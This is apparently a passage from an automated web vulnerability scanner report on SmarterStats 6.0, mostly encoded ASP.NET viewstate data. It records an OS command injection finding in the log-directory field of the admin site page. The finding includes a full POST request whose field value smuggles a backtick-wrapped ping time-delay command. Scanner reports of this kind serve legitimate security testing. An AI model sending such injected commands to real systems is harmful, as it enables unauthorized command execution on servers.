xOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAHQExvZ0ZUUAH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAACUxvZ0ZUUFRhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WGQUkY3RsMDAkTVBIJGNoa1Nlb0VuYWJsZWRfU2V0dGluZ0NoZWNrBShjdGwwMCRNUEgkY2hrU3RyaXBBZnRlclNlbWlfU2V0dGluZ0NoZWNrBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDAFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMQVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDMFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ1BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDYFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ4BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDkFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTAFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTEFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTIFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTMFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTQFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTUFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTYFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTcFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTgFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTkFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjAFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjEFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjEFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0xDzLWCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAIQE9wdGlvbnMB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAApPcHRpb25zVGFiC2QFGWN0bDAwJE1QSCRQYWdlSWRlbnRpZmllcjEPBSA2NzA2YjYxZDhmYjg0MDhkYjBiZDdkYWY5OTU2ZTNlY2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW03DzLaCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQExvZ1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADExvZ1N0YXR1c1RhYgtkX5dB0MWxfpOHdZB%2BIBMIEdqpxe094wua6ZwWPljnYkU%3D&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:04:04 GMT
Content-Length: 0


1.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24txtSmarterLogDirectory parameter appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the ctl00%24MPH%24txtSmarterLogDirectory parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 30128

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&__LASTFOCUS=&ctl00%24MPH%24lstServer_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MPH%24txtSmarterLogDirectory=C%3a%5cSmarterLogs`ping%20-c%2020%20127.0.0.1`&ctl00%24MPH%24lstLogFormat_SettingDropDown=IIS&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24grdLogLocationsCheckAll=on&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=555-555-0199@example.com&ctl00_MPH_grdSeoStatus_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00%24MPH%24chkStripAfterSemi_SettingCheck=on&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24txtExportLogDirectory=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24lstStatus_SettingDropDown=paused&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=hoytnet&ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-=on&__VIEWSTATE=%2fwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGFyaXM8KEdNVCswMTowMCkgQW1zdGVyZGFtLCBCZXJsaW4sIEJlcm4sIFJvbWUsIFN0b2NraG9sbSwgVmllbm5hHyhHTVQrMDE6MDApIFdlc3QgQ2VudHJhbCBBZnJpY